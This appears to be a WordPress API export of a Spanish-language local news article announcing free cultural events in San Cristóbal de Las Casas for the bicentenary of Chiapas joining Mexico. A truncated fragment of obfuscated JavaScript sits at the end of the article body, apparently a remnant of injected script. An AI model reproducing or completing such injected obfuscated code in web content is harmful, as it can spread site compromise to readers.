{"id":17668,"date":"2024-09-04T03:17:08","date_gmt":"2024-09-04T03:17:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17668"},"modified":"2024-09-04T03:17:09","modified_gmt":"2024-09-04T03:17:09","slug":"celebraran-bicentenario-de-la-federacion-de-chiapas-a-mexico-con-actividades-culturales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17668","title":{"rendered":"Celebrar\u00e1n Bicentenario de la Federaci\u00f3n de Chiapas a M\u00e9xico con actividades culturales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240903-WA0016-1024x577.jpg\" alt=\"\" class=\"wp-image-17669\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240903-WA0016-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240903-WA0016-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240903-WA0016-768x433.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240903-WA0016.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>3 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Con motivo de la conmemoraci\u00f3n del Bicentenario de la Federaci\u00f3n de Chiapas a M\u00e9xico, se han organizado una serie de actividades culturales gratuitas en dos de los principales foros de la ciudad. Emilio G\u00f3mez Ozuna, Director del Museo de San Crist\u00f3bal, inform\u00f3 sobre los eventos en una reciente entrevista.<\/p>\n\n\n\n<p>&#8220;El programa dar\u00e1 inicio el 6 de septiembre a las 11 de la ma\u00f1ana en el Museo de San Crist\u00f3bal, con la presentaci\u00f3n de un libro a cargo del destacado investigador Roberto Ramos Masa. La obra aborda el periodo comprendido entre 1821 y 1824, un momento crucial en la historia de Chiapas&#8221;.<\/p>\n\n\n\n<p>Asimismo, dijo que por la tarde, las celebraciones se trasladar\u00e1n al Teatro Hermanos Dom\u00ednguez, donde la Orquesta Sinf\u00f3nica de Chiapas ofrecer\u00e1 un concierto especial en honor al Bicentenario.<\/p>\n\n\n\n<p>Las actividades continuar\u00e1n el 8 de septiembre con la presentaci\u00f3n del Ballet Folkl\u00f3rico Bonampak. Este evento tambi\u00e9n se llevar\u00e1 a cabo en el Teatro de la Ciudad a las 6 de la tarde, cerrando as\u00ed una serie de eventos que buscan resaltar la importancia hist\u00f3rica de la incorporaci\u00f3n de Chiapas a la Federaci\u00f3n mexicana.<\/p>\n\n\n\n<p>Todos los eventos ser\u00e1n de acceso gratuito, invitando a la comunidad y visitantes a participar en estas celebraciones que buscan fortalecer la identidad cultural y el conocimiento hist\u00f3rico de la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 3 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Con motivo de la conmemoraci\u00f3n del Bicentenario de la Federaci\u00f3n de Chiapas a M\u00e9xico, se han organizado una serie de actividades culturales gratuitas en dos de los principales foros de la ciudad. Emilio G\u00f3mez Ozuna, Director del Museo de San Crist\u00f3bal, inform\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17668","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17668"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17668\/revisions"}],"predecessor-version":[{"id":17670,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17668\/revisions\/17670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17669"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}